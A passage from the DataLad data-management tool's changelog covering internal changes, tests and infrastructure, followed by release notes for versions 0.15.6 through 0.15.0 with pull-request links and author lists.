(`#6222 <https://github.com/datalad/datalad/pull/6222>`__ (by @mih)).\n The interface command list is restructured and resorted\n `#6223 <https://github.com/datalad/datalad/pull/6223>`__ (by @mih)\n- ``wrapt`` is replaced with functools’ ``wraps``\n `#6190 <https://github.com/datalad/datalad/pull/6190>`__ (by\n @yariktopic)\n- The unmaintained ``appdirs`` library has been replaced with\n ``platformdirs``\n `#6198 <https://github.com/datalad/datalad/pull/6198>`__ (by @adswa)\n- Modelines mismatching the code style in source files were fixed\n `#6263 <https://github.com/datalad/datalad/pull/6263>`__ (by @AKSoo)\n- ``datalad/__init__.py`` has been cleaned up\n `#6271 <https://github.com/datalad/datalad/pull/6271>`__ (by @mih)\n- ``GitRepo.call_git_items`` is implemented with a generator-based\n runner `#6278 <https://github.com/datalad/datalad/pull/6278>`__ (by\n @christian-monch)\n- Separate positional from keyword arguments in the Python API to match\n CLI with ``*``\n `#6176 <https://github.com/datalad/datalad/pull/6176>`__ (by\n @yarikoptic),\n `#6304 <https://github.com/datalad/datalad/pull/6304>`__ (by\n @christian-monch)\n- ``GitRepo.bare`` does not require the ConfigManager anymore\n `#6323 <https://github.com/datalad/datalad/pull/6323>`__ (by @mih)\n- ``_get_dot_git()`` was reimplemented to be more efficient and\n consistent, by testing for common scenarios first and introducing a\n consistently applied ``resolved`` flag for result path reporting\n `#6325 <https://github.com/datalad/datalad/pull/6325>`__ (by @mih)\n- All data files under ``datalad`` are now included when installing\n DataLad `#6336 <https://github.com/datalad/datalad/pull/6336>`__ (by\n @jwodder)\n- Add internal method for non-interactive provider/credential storing\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- Allow credential classes to have a context set, consisting of a URL\n they are to be used with and a dataset DataLad is operating on,\n allowing to consider “local” and “dataset” config locations\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- The Interface method ``get_refds_path()`` was deprecated\n `#6387 <https://github.com/datalad/datalad/pull/6387>`__ (by @adswa)\n- ``datalad.interface.base.Interface`` is now an abstract class\n `#6391 <https://github.com/datalad/datalad/pull/6391>`__ (by @mih)\n- Simplified the decision making for result rendering, and reduced code\n complexity `#6394 <https://github.com/datalad/datalad/pull/6394>`__\n (by @mih)\n- Reduce code duplication in ``datalad.support.json_py``\n `#6398 <https://github.com/datalad/datalad/pull/6398>`__ (by @mih)\n- Use public ``ArgumentParser.parse_known_args`` instead of protected\n ``_parse_known_args``\n `#6414 <https://github.com/datalad/datalad/pull/6414>`__ (by\n @yarikoptic)\n- ``add-archive-content`` does not rely on the deprecated\n ``tempfile.mktemp`` anymore, but uses the more secure\n ``tempfile.mkdtemp``\n `#6428 <https://github.com/datalad/datalad/pull/6428>`__ (by @adswa)\n- AnnexRepo’s internal ``annexstatus`` is deprecated. In its place, a\n new test helper assists the few tests that rely on it\n `#6413 <https://github.com/datalad/datalad/pull/6413>`__ (by @adswa)\n- ``config`` has been refactored from ``where[=\"dataset\"]`` to\n ``scope[=\"branch\"]``\n `#5969 <https://github.com/datalad/datalad/pull/5969>`__ (by\n @yarikoptic)\n- Common command arguments are now uniformly and exhaustively passed to\n result renderers and filters for decision making. Previously, the\n presence of a particular argument depended on the respective API and\n circumstances of a command call.\n `#6440 <https://github.com/datalad/datalad/pull/6440>`__ (by @mih)\n- Entrypoint processing for extensions and metadata extractors has been\n consolidated on a uniform helper that is about twice as fast as the\n previous implementations.\n `#6591 <https://github.com/datalad/datalad/pull/6591>`__ (by @mih)\n\n.. _tests-14:\n\nTests\n-----\n\n- A range of Windows tests pass and were enabled\n `#6136 <https://github.com/datalad/datalad/pull/6136>`__ (by @adswa)\n- Invalid escape sequences in some tests were fixed\n `#6147 <https://github.com/datalad/datalad/pull/6147>`__ (by @mih)\n- A cross-platform compatible HTTP-serving test environment is\n introduced `#6153 <https://github.com/datalad/datalad/pull/6153>`__\n (by @mih)\n- A new helper exposes ``serve_path_via_http`` to the command line to\n deploy an ad-hoc instance of the HTTP server used for internal\n testing, with SSL and auth, if desired.\n `#6169 <https://github.com/datalad/datalad/pull/6169>`__ (by @mih)\n- Windows tests were redistributed across worker runs to harmonize\n runtime `#6200 <https://github.com/datalad/datalad/pull/6200>`__ (by\n @adswa)\n- ``Batchedcommand`` gained a basic test\n `#6203 <https://github.com/datalad/datalad/pull/6203>`__ (by\n @christian-monch)\n- The use of ``with_testrepo`` is discontinued in all core tests\n `#6224 <https://github.com/datalad/datalad/pull/6224>`__ (by @mih)\n- The new ``git-annex.filter.annex.process`` configuration is enabled\n by default on Windows to speed up the test suite\n `#6245 <https://github.com/datalad/datalad/pull/6245>`__ (by @mih)\n- If the available Git version supports it, the test suite now uses\n ``GIT_CONFIG_GLOBAL`` to configure a fake home directory instead of\n overwriting ``HOME`` on OSX\n (`#6251 <https://github.com/datalad/datalad/pull/6251>`__ (by\n @bpoldrack)) and ``HOME`` and ``USERPROFILE`` on Windows\n `#6260 <https://github.com/datalad/datalad/pull/6260>`__ (by @adswa)\n- Windows test timeouts of runners were addressed\n `#6311 <https://github.com/datalad/datalad/pull/6311>`__ (by\n @christian-monch)\n- A handful of Windows tests were fixed\n (`#6352 <https://github.com/datalad/datalad/pull/6352>`__ (by\n @yarikoptic)) or disabled\n (`#6353 <https://github.com/datalad/datalad/pull/6353>`__ (by\n @yarikoptic))\n- ``download-url``\\ ’s test under ``http_proxy`` are skipped when a\n session can’t be established\n `#6361 <https://github.com/datalad/datalad/pull/6361>`__ (by\n @yarikoptic)\n- A test for ``datalad clean`` was fixed to be invoked within a dataset\n `#6359 <https://github.com/datalad/datalad/pull/6359>`__ (by\n @yarikoptic)\n- The new datalad.cli.tests have an improved module coverage of 80%\n `#6378 <https://github.com/datalad/datalad/pull/6378>`__ (by @mih)\n- The ``test_source_candidate_subdataset`` has been marked as ``@slow``\n `#6429 <https://github.com/datalad/datalad/pull/6429>`__ (by\n @yarikoptic)\n- Dedicated ``CLI`` benchmarks exist now\n `#6381 <https://github.com/datalad/datalad/pull/6381>`__ (by @mih)\n- Enable code coverage report for subprocesses\n `#6546 <https://github.com/datalad/datalad/pull/6546>`__ (by @adswa)\n- Skip a test on annex>=10.20220127 due to a bug in annex. See\n https://git-annex.branchable.com/bugs/Change_to_annex.largefiles_leaves_repo_modified/\n\nInfra\n-----\n\n- A new issue template using GitHub forms prestructures bug reports\n `#6048 <https://github.com/datalad/datalad/pull/6048>`__ (by\n @Remi-Gau)\n- DataLad and its dependency stack were packaged for Gentoo Linux\n `#6088 <https://github.com/datalad/datalad/pull/6088>`__ (by\n @TheChymera)\n- The readthedocs configuration is modernized to version 2\n `#6207 <https://github.com/datalad/datalad/pull/6207>`__ (by @adswa)\n- The Windows CI setup now runs on Appveyor’s Visual Studio 2022\n configuration\n `#6228 <https://github.com/datalad/datalad/pull/6228>`__ (by @adswa)\n- The ``readthedocs-theme`` and ``Sphinx`` versions were pinned to\n re-enable rendering of bullet points in the documentation\n `#6346 <https://github.com/datalad/datalad/pull/6346>`__ (by @adswa)\n- The PR template was updated with a CHANGELOG template. Future PRs\n should use it to include a summary for the CHANGELOG\n `#6396 <https://github.com/datalad/datalad/pull/6396>`__ (by @mih)\n\nAuthors: 11\n-----------\n\n- Michael Hanke (@mih)\n- Yaroslav Halchenko (@yarikoptic)\n- Adina Wagner (@adswa)\n- Remi Gau (@Remi-Gau)\n- Horea Christian (@TheChymera)\n- Micha Szczepanik (@mslw)\n- Christian Mnch (@christian-monch)\n- John T. Wodder (@jwodder)\n- Benjamin Poldrack (@bpoldrack)\n- Sin Kim (@AKSoo)\n- Basile Pinsard (@bpinsard)\n\n--------------\n\n0.15.6 (Sun Feb 27 2022)\n========================\n\n.. _bug-fix-11:\n\nBug Fix\n-------\n\n- BF: do not use BaseDownloader instance wide InterProcessLock -\n resolves stalling or errors during parallel installs\n `#6507 <https://github.com/datalad/datalad/pull/6507>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- release workflow: add -vv to auto invocation\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Fix version incorrectly incremented by release process in CHANGELOGs\n `#6459 <https://github.com/datalad/datalad/pull/6459>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): add another condition to skip under http_proxy set\n `#6459 <https://github.com/datalad/datalad/pull/6459>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-1-1:\n\nAuthors: 1\n----------\n\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.5 (Wed Feb 09 2022)\n========================\n\nEnhancement\n-----------\n\n- BF: When download-url gets Pathobject as path convert it to a string\n `#6364 <https://github.com/datalad/datalad/pull/6364>`__\n (`@adswa <https://github.com/adswa>`__)\n\n.. _bug-fix-12:\n\nBug Fix\n-------\n\n- Fix AnnexRepo.whereis key=True mode operation, and add batch mode\n support `#6379 <https://github.com/datalad/datalad/pull/6379>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: run - adjust description for -i/-o to mention that it could be a\n directory `#6416 <https://github.com/datalad/datalad/pull/6416>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: ORA over HTTP tried to check archive\n `#6355 <https://github.com/datalad/datalad/pull/6355>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: condition access to isatty to have stream eval to True\n `#6360 <https://github.com/datalad/datalad/pull/6360>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: python 3.10 compatibility fixes\n `#6363 <https://github.com/datalad/datalad/pull/6363>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Remove two(!) copies of a test\n `#6374 <https://github.com/datalad/datalad/pull/6374>`__\n (`@mih <https://github.com/mih>`__)\n- Warn just once about incomplete git config\n `#6343 <https://github.com/datalad/datalad/pull/6343>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Make version detection robust to GIT_DIR specification\n `#6341 <https://github.com/datalad/datalad/pull/6341>`__\n (`@effigies <https://github.com/effigies>`__\n `@mih <https://github.com/mih>`__)\n- BF(Q&D): do not crash - issue warning - if template fails to format\n `#6319 <https://github.com/datalad/datalad/pull/6319>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-5-3:\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Chris Markiewicz (`@effigies <https://github.com/effigies>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.4 (Thu Dec 16 2021)\n========================\n\n.. _bug-fix-13:\n\nBug Fix\n-------\n\n- BF: autorc - replace incorrect releaseTypes with “none”\n `#6320 <https://github.com/datalad/datalad/pull/6320>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Minor enhancement to CONTRIBUTING.md\n `#6309 <https://github.com/datalad/datalad/pull/6309>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- UX: If a clean repo is dirty after a failed run, give clean-up hints\n `#6112 <https://github.com/datalad/datalad/pull/6112>`__\n (`@adswa <https://github.com/adswa>`__)\n- Stop using distutils\n `#6113 <https://github.com/datalad/datalad/pull/6113>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- BF: RIARemote - set UI backend to annex to make it interactive\n `#6287 <https://github.com/datalad/datalad/pull/6287>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__\n `@bpoldrack <https://github.com/bpoldrack>`__)\n- Fix invalid escape sequences\n `#6293 <https://github.com/datalad/datalad/pull/6293>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- CI: Update environment for windows CI builds\n `#6292 <https://github.com/datalad/datalad/pull/6292>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- bump the python version used for mac os tests\n `#6288 <https://github.com/datalad/datalad/pull/6288>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@bpoldrack <https://github.com/bpoldrack>`__)\n- ENH(UX): log a hint to use ulimit command in case of “Too long”\n exception `#6173 <https://github.com/datalad/datalad/pull/6173>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Report correct HTTP URL for RIA store content\n `#6091 <https://github.com/datalad/datalad/pull/6091>`__\n (`@mih <https://github.com/mih>`__)\n- BF: Don’t overwrite subdataset source candidates\n `#6168 <https://github.com/datalad/datalad/pull/6168>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Bump sphinx requirement to bypass readthedocs defaults\n `#6189 <https://github.com/datalad/datalad/pull/6189>`__\n (`@mih <https://github.com/mih>`__)\n- infra: Provide custom prefix to auto-related labels\n `#6151 <https://github.com/datalad/datalad/pull/6151>`__\n (`@adswa <https://github.com/adswa>`__)\n- Remove all usage of exc_str()\n `#6142 <https://github.com/datalad/datalad/pull/6142>`__\n (`@mih <https://github.com/mih>`__)\n- BF: obtain information about annex special remotes also from annex\n journal `#6135 <https://github.com/datalad/datalad/pull/6135>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__\n `@mih <https://github.com/mih>`__)\n- BF: clone tried to save new subdataset despite failing to clone\n `#6140 <https://github.com/datalad/datalad/pull/6140>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _tests-15:\n\nTests\n-----\n\n- RF+BF: use skip_if_no_module helper instead of try/except for libxmp\n and boto `#6148 <https://github.com/datalad/datalad/pull/6148>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- git://github.com -> https://github.com\n `#6134 <https://github.com/datalad/datalad/pull/6134>`__\n (`@mih <https://github.com/mih>`__)\n\nAuthors: 6\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.3 (Sat Oct 30 2021)\n========================\n\n.. _bug-fix-14:\n\nBug Fix\n-------\n\n- BF: Don’t make create-sibling recursive by default\n `#6116 <https://github.com/datalad/datalad/pull/6116>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: Add dashes to ‘force’ option in non-empty directory error message\n `#6078 <https://github.com/datalad/datalad/pull/6078>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__)\n- DOC: Add supported URL types to download-url’s docstring\n `#6098 <https://github.com/datalad/datalad/pull/6098>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: Retain git-annex error messages & don’t show them if operation\n successful `#6070 <https://github.com/datalad/datalad/pull/6070>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__)\n- Remove uses of ``__full_version__`` and ``datalad.version``\n `#6073 <https://github.com/datalad/datalad/pull/6073>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- BF: ORA shouldn’t crash while handling a failure\n `#6063 <https://github.com/datalad/datalad/pull/6063>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n- DOC: Refine –reckless docstring on usage and wording\n `#6043 <https://github.com/datalad/datalad/pull/6043>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: archives upon strip - use rmtree which retries etc instead of\n rmdir `#6064 <https://github.com/datalad/datalad/pull/6064>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: do not leave test in a tmp dir destined for removal\n `#6059 <https://github.com/datalad/datalad/pull/6059>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Next wave of exc_str() removals\n `#6022 <https://github.com/datalad/datalad/pull/6022>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _pushed-to-maint-3:\n\nPushed to ``maint``\n-------------------\n\n- CI: Enable new codecov uploader in Appveyor CI\n (`@adswa <https://github.com/adswa>`__)\n\n.. _internal-13:\n\nInternal\n--------\n\n- UX: Log clone-candidate number and URLs\n `#6092 <https://github.com/datalad/datalad/pull/6092>`__\n (`@adswa <https://github.com/adswa>`__)\n- UX/ENH: Disable reporting, and don’t do superfluous internal\n subdatasets calls\n `#6094 <https://github.com/datalad/datalad/pull/6094>`__\n (`@adswa <https://github.com/adswa>`__)\n- Update codecov action to v2\n `#6072 <https://github.com/datalad/datalad/pull/6072>`__\n (`@jwodder <https://github.com/jwodder>`__)\n\n.. _documentation-11:\n\nDocumentation\n-------------\n\n- Design document on URL substitution feature\n `#6065 <https://github.com/datalad/datalad/pull/6065>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _tests-16:\n\nTests\n-----\n\n- BF(TST): remove reuse of the same tape across unrelated tests\n `#6127 <https://github.com/datalad/datalad/pull/6127>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Fail Travis tests on deprecation warnings\n `#6074 <https://github.com/datalad/datalad/pull/6074>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Ux get result handling broken\n `#6052 <https://github.com/datalad/datalad/pull/6052>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- enable metalad tests again\n `#6060 <https://github.com/datalad/datalad/pull/6060>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n\n.. _authors-7-1:\n\nAuthors: 7\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Burgardt (`@DisasterMo <https://github.com/DisasterMo>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.2 (Wed Oct 06 2021)\n========================\n\n.. _bug-fix-15:\n\nBug Fix\n-------\n\n- BF: Don’t suppress datalad subdatasets output\n `#6035 <https://github.com/datalad/datalad/pull/6035>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__\n `@mih <https://github.com/mih>`__)\n- Honor datalad.runtime.use-patool if set regardless of OS (was Windows\n only) `#6033 <https://github.com/datalad/datalad/pull/6033>`__\n (`@mih <https://github.com/mih>`__)\n- Discontinue usage of deprecated (public) helper\n `#6032 <https://github.com/datalad/datalad/pull/6032>`__\n (`@mih <https://github.com/mih>`__)\n- BF: ProgressHandler - close the other handler if was specified\n `#6020 <https://github.com/datalad/datalad/pull/6020>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- UX: Report GitLab weburl of freshly created projects in the result\n `#6017 <https://github.com/datalad/datalad/pull/6017>`__\n (`@adswa <https://github.com/adswa>`__)\n- Ensure there’s a blank line between the class ``__doc__`` and\n “Parameters” in ``build_doc`` docstrings\n `#6004 <https://github.com/datalad/datalad/pull/6004>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Large code-reorganization of everything runner-related\n `#6008 <https://github.com/datalad/datalad/pull/6008>`__\n (`@mih <https://github.com/mih>`__)\n- Discontinue exc_str() in all modern parts of the code base\n `#6007 <https://github.com/datalad/datalad/pull/6007>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _tests-17:\n\nTests\n-----\n\n- TST: Add test to ensure functionality with subdatasets starting with\n a hyphen (-) `#6042 <https://github.com/datalad/datalad/pull/6042>`__\n (`@DisasterMo <https://github.com/DisasterMo>`__)\n- BF(TST): filter away warning from coverage from analysis of stderr of\n –help `#6028 <https://github.com/datalad/datalad/pull/6028>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: disable outdated SSL root certificate breaking chain on\n older/buggy clients\n `#6027 <https://github.com/datalad/datalad/pull/6027>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: start global test_http_server only if not running already\n `#6023 <https://github.com/datalad/datalad/pull/6023>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-5-4:\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Burgardt (`@DisasterMo <https://github.com/DisasterMo>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.1 (Fri Sep 24 2021)\n========================\n\n.. _bug-fix-16:\n\nBug Fix\n-------\n\n- BF: downloader - fail to download even on non-crippled FS if symlink\n exists `#5991 <https://github.com/datalad/datalad/pull/5991>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: import datalad.api to bind extensions methods for discovery of\n dataset methods\n `#5999 <https://github.com/datalad/datalad/pull/5999>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Restructure cmdline API presentation\n `#5988 <https://github.com/datalad/datalad/pull/5988>`__\n (`@mih <https://github.com/mih>`__)\n- Close file descriptors after process exit\n `#5983 <https://github.com/datalad/datalad/pull/5983>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _pushed-to-maint-4:\n\nPushed to ``maint``\n-------------------\n\n- Discontinue testing of hirni extension\n (`@mih <https://github.com/mih>`__)\n\n.. _internal-14:\n\nInternal\n--------\n\n- Add debugging information to release step\n `#5980 <https://github.com/datalad/datalad/pull/5980>`__\n (`@jwodder <https://github.com/jwodder>`__)\n\n.. _documentation-12:\n\nDocumentation\n-------------\n\n- Coarse description of the credential subsystem’s functionality\n `#5998 <https://github.com/datalad/datalad/pull/5998>`__\n (`@mih <https://github.com/mih>`__)\n\n.. _tests-18:\n\nTests\n-----\n\n- BF(TST): use sys.executable, mark test_ria_basics.test_url_keys as\n requiring network\n `#5986 <https://github.com/datalad/datalad/pull/5986>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-3-5:\n\nAuthors: 3\n----------\n\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.15.0 (Tue Sep 14 2021) – We miss you Kyle!\n============================================\n\n.. _enhancements-and-new-features-5:\n\nEnhancements and new features\n-----------------------------\n\n- Command execution is now performed by a new ``Runner`` implementation\n that is no longer based on the ``asyncio`` framework, which was found\n to exhibit fragile performance in interaction with other\n ``asyncio``-using code, such as Jupyter notebooks. The new\n implementation is based on threads. It also supports the\n specification of “protocols” that were introduced with the switch to\n the ``asyncio`` implementation in 0.14.0.\n (`#5667 <https://github.com/datalad/datalad/issues/5667>`__)\n\n- ``clone`` now supports arbitrary URL transformations based on regular\n expressions. One or more transformation steps can be defined via\n ``datalad.clone.url-substitute.<label>`` configuration settings. The\n feature can be (and is now) used to support convenience mappings,\n such as ``https://osf.io/q8xnk/`` (displayed in a browser window) to\n ``osf://q8xnk`` (clonable via the ``datalad-osf`` extension.\n (`#5749 <https://github.com/datalad/datalad/issues/5749>`__)\n\n- Homogenize SSH use and configurability between DataLad and git-annex,\n by instructing git-annex to use DataLad’s ``sshrun`` for SSH calls\n (instead of SSH directly).\n (`#5389 <https://github.com/datalad/datalad/issues/5389>`__)\n\n- The ORA special remote has received several new features:\n\n - It now support a ``push-url`` setting as an alternative to ``url``\n for write access. An analog parameter was also added to\n ``create-sibling-ria``.\n (`#5420 <https://github.com/datalad/datalad/issues/5420>`__,\n `#5428 <https://github.com/datalad/datalad/issues/5428>`__)\n\n - Access of RIA stores now performs homogeneous availability checks,\n regardless of access protocol. Before, broken HTTP-based access\n due to misspecified URLs could have gone unnoticed.\n (`#5459 <https://github.com/datalad/datalad/issues/5459>`__,\n `#5672 <https://github.com/datalad/datalad/issues/5672>`__)\n\n - Error reporting was introduce to inform about undesirable\n conditions in remote RIA stores.\n (`#5683 <https://github.com/datalad/datalad/issues/5683>`__)\n\n- ``create-sibling-ria`` now supports ``--alias`` for the specification\n of a convenience dataset alias name in a RIA store.\n (`#5592 <https://github.com/datalad/datalad/issues/5592>`__)\n\n- Analog to ``git commit``, ``save`` now features an ``--amend`` mode\n to support incremental updates of a dataset state.\n (`#5430 <https://github.com/datalad/datalad/issues/5430>`__)\n\n- ``run`` now supports a dry-run mode that can be used to inspect the\n result of parameter expansion on the effective command to ease the\n composition of more complicated command lines.\n (`#5539 <https://github.com/datalad/datalad/issues/5539>`__)\n\n- ``run`` now supports a ``--assume-ready`` switch to avoid the\n (possibly expensive) preparation of inputs and outputs with large\n datasets that have already been readied through other means.\n (`#5431 <https://github.com/datalad/datalad/issues/5431>`__)\n\n- ``update`` now features ``--how`` and ``--how-subds`` parameters to\n configure how an update shall be performed. Supported modes are\n ``fetch`` (unchanged default), and ``merge`` (previously also\n possible via ``--merge``), but also new strategies like ``reset`` or\n ``checkout``.\n (`#5534 <https://github.com/datalad/datalad/issues/5534>`__)\n\n- ``update`` has a new ``--follow=parentds-lazy`` mode that only\n performs a fetch operation in subdatasets when the desired commit is\n not yet present. During recursive updates involving many subdatasets\n this can substantially speed up performance.\n (`#5474 <https://github.com/datalad/datalad/issues/5474>`__)\n\n- DataLad’s command line API can now report the version for individual\n commands via ``datalad <cmd> --version``. The output has been\n homogenized to ``<providing package> <version>``.\n (`#5543 <https://github.com/datalad/datalad/issues/5543>`__)\n\n- ``create-sibling`` now logs information on an auto-generated sibling\n name, in the case that no ``--name/-s`` was provided.\n (`#5550 <https://github.com/datalad/datalad/issues/5550>`__)\n\n- ``create-sibling-github`` has been updated to emit result records\n like any standard DataLad command. Previously it was implemented as a\n “plugin”, which did not support all standard API parameters.\n (`#5551 <https://github.com/datalad/datalad/issues/5551>`__)\n\n- ``copy-file`` now also works with content-less files in datasets on\n crippled filesystems (adjusted mode), when a recent enough git-annex\n (8.20210428 or later) is available.\n (`#5630 <https://github.com/datalad/datalad/issues/5630>`__)\n\n- ``addurls`` can now be instructed how to behave in the event of file\n name collision via a new parameter ``--on-collision``.\n (`#5675 <https://github.com/datalad/datalad/issues/5675>`__)\n\n- ``addurls`` reporting now informs which particular subdatasets were\n created. (`#5689 <https://github.com/datalad/datalad/issues/5689>`__)\n\n- Credentials can now be provided or overwritten via all means\n supported by ``ConfigManager``. Importantly,\n ``datalad.credential.<name>.<field>`` configuration settings and\n analog specification via environment variables are now supported\n (rather than custom environment variables only). Previous\n specification methods are still supported too.\n (`#5680 <https://github.com/datalad/datalad/issues/5680>`__)\n\n- A new ``datalad.credentials.force-ask`` configuration flag can now be\n used to force re-entry of already known credentials. This simplifies\n credential updates without having to use an approach native to\n individual credential stores.\n (`#5777 <https://github.com/datalad/datalad/issues/5777>`__)\n\n- Suppression of rendering repeated similar results is now configurable\n via the configuration switches\n ``datalad.ui.suppress-similar-results`` (bool), and\n ``datalad.ui.suppress-similar-results-threshold`` (int).\n (`#5681 <https://github.com/datalad/datalad/issues/5681>`__)\n\n- The performance of ``status`` and similar functionality when\n determining local file availability has been improved.\n (`#5692 <https://github.com/datalad/datalad/issues/5692>`__)\n\n- ``push`` now renders a result summary on completion.\n (`#5696 <https://github.com/datalad/datalad/issues/5696>`__)\n\n- A dedicated info log message indicates when dataset repositories are\n subjected to an annex version upgrade.\n (`#5698 <https://github.com/datalad/datalad/issues/5698>`__)\n\n- Error reporting improvements:\n\n - The ``NoDatasetFound`` exception now provides information for\n which purpose a dataset is required.\n (`#5708 <https://github.com/datalad/datalad/issues/5708>`__)\n\n - Wording of the ``MissingExternalDependeny`` error was rephrased to\n account for cases of non-functional installations.\n (`#5803 <https://github.com/datalad/datalad/issues/5803>`__)\n\n - ``push`` reports when a ``--to`` parameter specification was\n (likely) forgotten.\n (`#5726 <https://github.com/datalad/datalad/issues/5726>`__)\n\n - Detailed information is now given when DataLad fails to obtain a\n lock for credential entry in a timely fashion. Previously only a\n generic debug log message was emitted.\n (`#5884 <https://github.com/datalad/datalad/issues/5884>`__)\n\n - Clarified error message when ``create-sibling-gitlab`` was called\n without ``--project``.\n (`#5907 <https://github.com/datalad/datalad/issues/5907>`__)\n\n- ``add-readme`` now provides a README template with more information\n on the nature and use of DataLad datasets. A README file is no longer\n annex’ed by default, but can be using the new ``--annex`` switch.\n ([#5723][], [#5725][])\n\n- ``clean`` now supports a ``--dry-run`` mode to inform about cleanable\n content. (`#5738 <https://github.com/datalad/datalad/issues/5738>`__)\n\n- A new configuration setting ``datalad.locations.locks`` can be used\n to control the placement of lock files.\n (`#5740 <https://github.com/datalad/datalad/issues/5740>`__)\n\n- ``wtf`` now also reports branch names and states.\n (`#5804 <https://github.com/datalad/datalad/issues/5804>`__)\n\n- ``AnnexRepo.whereis()`` now supports batch mode.\n (`#5533 <https://github.com/datalad/datalad/issues/5533>`__)\n\n.. _deprecations-and-removals-2:\n\nDeprecations and removals\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- The minimum supported git-annex version is now 8.20200309.\n (`#5512 <https://github.com/datalad/datalad/issues/5512>`__)\n\n- ORA special remote configuration items ``ssh-host``, and\n ``base-path`` are deprecated. They are completely replaced by\n ``ria+<protocol>://`` URL specifications.\n (`#5425 <https://github.com/datalad/datalad/issues/5425>`__)\n\n- The deprecated ``no_annex`` parameter of ``create()`` was removed\n from the Python API.\n (`#5441 <https://github.com/datalad/datalad/issues/5441>`__)\n\n- The unused ``GitRepo.pull()`` method has been removed.\n (`#5558 <https://github.com/datalad/datalad/issues/5558>`__)\n\n- Residual support for “plugins” (a mechanism used before DataLad\n supported extensions) was removed. This includes the configuration\n switches ``datalad.locations.{system,user}-plugins``.\n (`#5554 <https://github.com/datalad/datalad/issues/5554>`__,\n 